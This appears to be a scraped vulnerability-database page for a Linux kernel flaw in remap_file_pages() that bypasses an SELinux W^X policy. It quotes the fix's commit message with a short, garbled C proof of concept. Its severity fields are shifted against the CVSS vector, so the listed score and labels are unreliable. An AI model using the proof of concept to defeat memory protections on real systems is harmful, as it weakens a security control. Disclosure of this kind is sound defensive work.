CVE-2024-47745 Information

Nov 01, 2024 cve

Description

In the Linux kernel the following vulnerability has been resolved:

mm: call the security_mmap_file() LSM hook in remap_file_pages()

The remap_file_pages syscall handler calls do_mmap() directly which doesn’t contain the LSM security check. And if the process has called personality(READ_IMPLIES_EXEC) before and remap_file_pages() is called for RW pages this will actually result in remapping the pages to RWX bypassing a W^X policy enforced by SELinux.

So we should check prot by security_mmap_file LSM hook in the remap_file_pages syscall handler before do_mmap() is called. Otherwise it potentially permits an attacker to bypass a W^X policy enforced by SELinux.

The bypass is similar to CVE-2016-10044 which bypass the same thing via AIO and can be found in [1].

The PoC:

$ cat > test.c

int main(void) size_t pagesz = sysconf(_SC_PAGE_SIZE); int mfd = syscall(SYS_memfd_create est\ 0); const char buf = mmap(NULL 4 pagesz PROT_READ | PROT_WRITE MAP_SHARED mfd 0); unsigned int old = syscall(SYS_personality 0xffffffff); syscall(SYS_personality READ_IMPLIES_EXEC | old); syscall(SYS_remap_file_pages buf pagesz 0 2 0); syscall(SYS_personality old); // show the RWX page exists even if W^X policy is enforced int fd = open(/proc/self/maps\ O_RDONLY); unsigned char buf2[1024]; while (1) int ret = read(fd buf2 1024); if (ret <= 0) break; write(1 buf2 ret);

close(fd);

$ gcc test.c -o test $ ./test | grep rwx 7f1836c34000-7f1836c35000 rwxs 00002000 00:01 2050 /memfd:test (deleted)

[PM: subject line tweaks]

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Reference

https://git.kernel.org/stable/c/49d3a4ad57c57227c3b0fd6cd4188b2a5ebd6178 https://git.kernel.org/stable/c/3393fddbfa947c8e1fdcc4509226905ffffd8b89 https://git.kernel.org/stable/c/ce14f38d6ee9e88e37ec28427b4b93a7c33c70d3 https://git.kernel.org/stable/c/ea7e2d5e49c05e5db1922387b09ca74aa40f46e2

Attack Complexity

LOW

Privileges Required

LOW

User Interaction Required

LOW

Scope

NONE

Confidentiality Impact

UNCHANGED

Integrity Impact

HIGH

Availability Impact

HIGH

Base Score

HIGH

Base Severity

7.8

Share on: